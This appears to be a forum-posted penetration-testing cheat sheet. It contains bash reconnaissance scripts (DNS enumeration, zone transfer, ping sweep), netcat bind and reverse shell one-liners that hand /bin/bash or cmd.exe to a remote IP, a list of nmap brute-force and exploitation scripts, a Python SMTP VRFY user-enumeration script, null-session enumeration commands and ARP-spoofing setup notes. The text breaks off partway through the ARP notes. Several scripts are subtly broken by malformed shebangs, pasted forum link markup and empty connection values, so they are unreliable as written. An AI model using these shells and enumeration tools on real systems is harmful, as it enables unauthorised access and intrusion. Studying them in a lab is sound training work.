BASH(save as .sh and chmod 755): ***************************************************************** text manipulation- #!/bin/bash/ grep "href=" icq.html | cut -d"/" -f3 | grep [url="http://icq.com/"]icq.com[/url] | sort -u find IPs- #!/bin/bash/ for name in $(cat icqservers.txt);do host $name | grep "has address" | cut -d" " -f4 done ping IPs- #!/bin/bash/ for ip in $(seq 200 250);do ping -c1 192.168.1.$ip | grep "bytes from" done DNS Forward- #!/bin/bash/ host $[url="http://name.checkpoint.com/"]name.checkpoint.com[/url] | grep "has address" done DNS Reverse- #!/bin/bash/ for ip in $(seq 64 79); do host 204.236.255.$ip | grep "domain name pointer ";done Zone XFR- #!/bin/bash/ echo "[*] Please enter a domain name:" read domain for fqdn in $(host -tns $domain | cut -d" " -f4);do host -l domain $fqdn | grep "has address" done SNMP Bruteforce(for use with onesixtyone)- (script to gleam local address for 161) #!/bin/bash for ip in $(seq 1 254); do echo ip.usally.local.$ip;done > log.txt *************************************************************** BindShell: nc -lvp 4444; listen on port 4444; with -e cmd.exe(or /bin/bash) is make cmd or bash,available aka: bind cmd or bash to nc. i.e: nc -lvp 4444 -e cmd.exe ReverseShell: nc -v x.x.x.x 4444 connect to IP port:4444; with -e cmd.exe or /bin/bash is to forward the shell to IP on port 4444 i.e: nc -v x.x.x.x 4444 -e /bin/bash Banner Grab: nc -v www.x.com 80 HEAD / HTTP1.0 or echo -ne 'HEAD / HTTP/1.0' nc -vv
:netcat portscan nc -z -nvv -w 1 -p port local port number -l listen mode, for inbound connects -e to exec after connect -o file hex dump of traffic -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -n numeric-only IP addresses, no DNS -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] NSE: nmap --script X.nse /usr/share/nmap/scripts/asn-query.nse /usr/local/share/nmap/scripts/auth-owners.nse /usr/local/share/nmap/scripts/auth-spoof.nse /usr/local/share/nmap/scripts/banner.nse /usr/local/share/nmap/scripts/smb-brute.nse /usr/local/share/nmap/scripts/smb-check-vulns.nse /usr/local/share/nmap/scripts/smb-enum-domains.nse /usr/local/share/nmap/scripts/smb-enum-groups.nse /usr/local/share/nmap/scripts/smb-enum-processes.nse /usr/local/share/nmap/scripts/smb-enum-sessions.nse /usr/local/share/nmap/scripts/smb-enum-shares.nse /usr/local/share/nmap/scripts/smb-enum-users.nse /usr/local/share/nmap/scripts/smb-os-discovery.nse /usr/local/share/nmap/scripts/smb-psexec.nse /usr/local/share/nmap/scripts/smb-security-mode.nse /usr/local/share/nmap/scripts/smb-server-stats.nse /usr/local/share/nmap/scripts/smb-system-info.nse /usr/local/share/nmap/scripts/smbv2-enabled.nse /usr/local/share/nmap/scripts/smtp-commands.nse /usr/local/share/nmap/scripts/smtp-open-relay.nse /usr/local/share/nmap/scripts/smtp-strangeport.nse /usr/local/share/nmap/scripts/sniffer-detect.nse /usr/local/share/nmap/scripts/snmp-brute.nse /usr/local/share/nmap/scripts/snmp-sysdescr.nse /usr/local/share/nmap/scripts/socks-open-proxy.nse /usr/local/share/nmap/scripts/sql-injection.nse /usr/local/share/nmap/scripts/ssh-hostkey.nse /usr/local/share/nmap/scripts/sshv1.nse /usr/local/share/nmap/scripts/ssl-cert.nse /usr/local/share/nmap/scripts/sslv2.nse /usr/local/share/nmap/scripts/telnet-brute.nse /usr/local/share/nmap/scripts/upnp-info.nse /usr/local/share/nmap/scripts/whois.nse /usr/local/share/nmap/scripts/x11-access.nse Pythton: SMTP USER CHECK- #!/usr/bin/python import socket import sys if len(sys.argv) !=2: print "usage: vrfy.py " sys.exit(0) #create socket s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #connect to server connect=s.connect(('',)) #rcv & prnt banner banner=s.recv(1024) print banner #send,VRFY request & print s.send('VRFY ' + sys.argv[1] + '\r\n') result=s.recv(1024) print result #close socket s.close() Null Session Attacks: rpcclient -U "" >help, srvinfo, enumdomusers, enumdomgroups, getdomwinfo ARPSpoof Notes: ipv6 doesnt use ARP,so not susceptible to ARP Poisoning/Spoofing. ARP Spoofing attacks is a local attack,by default. There are ways to circumvent this,but not covered here. You will want the following information: Gateway : ipv4:MAC Attacker: ipv4:MAC Victim : ipv4:MAC You will need the following *NIX command and BASH Script. file2cable script: *(1)ip forward: echo 1 > /proc/sys/net/ipv4/ip_forward *(2)file2cable bash script. save script as .sh, chmod 755 , execute as ./